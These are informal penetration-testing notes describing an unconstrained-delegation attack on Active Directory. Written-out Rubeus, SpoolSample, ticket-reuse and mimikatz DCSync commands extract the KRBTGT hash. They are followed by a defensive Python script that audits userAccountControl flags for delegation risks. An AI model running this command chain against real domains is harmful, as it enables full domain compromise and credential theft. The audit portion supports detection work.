Set Rubeus Monitor Mode
Run SpoolSample thingamajiggy to get dem DCs to do stuff to things
Extract the mf tickets automagically

1. Compromise a server configured with unconstrained delegation
2. Begin monitoring for delegated TGTs with Rubeus monitor /interval:5
3. Coerce the domain controller to authenticate to the unconstrained server using SpoolSample

1. execute-assembly /opt/exe/Rubeus.exe monitor /interval:5 /filteruser:DC_parent
2. execute-assembly /opt/exe/SpoolSample.exe DC_parent DC_child
3. Wait for Rubeus to give us the ticket
4. Make a sacrificial login token, e.g., make_token domain.local\DC_parent$ test_user Password123!
5. Use the Kerberos ticket: kerberos_ticket_use /opt/tickets/ticket.kirbi
6. DCSync stuff: mimikatz @lsadump::dcsync /user:parent.local\KRBTGT
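
A defender-side check for the precondition in step 1, as an added example that is not part of the original notes: it flags enabled non-DC accounts whose userAccountControl has TRUSTED_FOR_DELEGATION set, and privileged accounts that lack NOT_DELEGATED. The account names, the is_privileged column and the sample values are constructed assumptions; the flag constants are the documented userAccountControl bits.

```python
# Added example: audit userAccountControl values for unconstrained delegation.
# The records below are constructed sample data, not output from a real domain.

# userAccountControl bit flags (documented by Microsoft)
ACCOUNTDISABLE = 0x0002
SERVER_TRUST_ACCOUNT = 0x2000      # domain controller computer account
TRUSTED_FOR_DELEGATION = 0x80000   # unconstrained delegation
NOT_DELEGATED = 0x100000           # "Account is sensitive and cannot be delegated"

# Constructed export: (sAMAccountName, userAccountControl, is_privileged)
SAMPLE_ACCOUNTS = [
    ("DC01$", 0x82000, False),       # DC: delegation flag is expected here
    ("APP01$", 0x81000, False),      # member server trusted for delegation
    ("WS042$", 0x1000, False),       # ordinary workstation
    ("svc_legacy", 0x80200, False),  # user account trusted for delegation
    ("old_srv$", 0x81002, False),    # disabled, so skipped
    ("da_alice", 0x200, True),       # privileged, TGT can be delegated
    ("da_bob", 0x100200, True),      # privileged, marked NOT_DELEGATED
]


def audit(accounts):
    """Return (unconstrained, unprotected) lists of account names."""
    unconstrained, unprotected = [], []
    for name, uac, privileged in accounts:
        if uac & ACCOUNTDISABLE:
            continue
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)
        # Any non-DC account with this bit caches the TGTs of whoever
        # authenticates to it, which is what steps 2 and 3 rely on.
        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            unconstrained.append(name)
        # Privileged accounts without NOT_DELEGATED can have TGTs forwarded.
        if privileged and not uac & NOT_DELEGATED:
            unprotected.append(name)
    return unconstrained, unprotected


if __name__ == "__main__":
    hosts, users = audit(SAMPLE_ACCOUNTS)
    print("Unconstrained delegation on non-DC accounts:", hosts)
    print("Privileged accounts that can still be delegated:", users)
```
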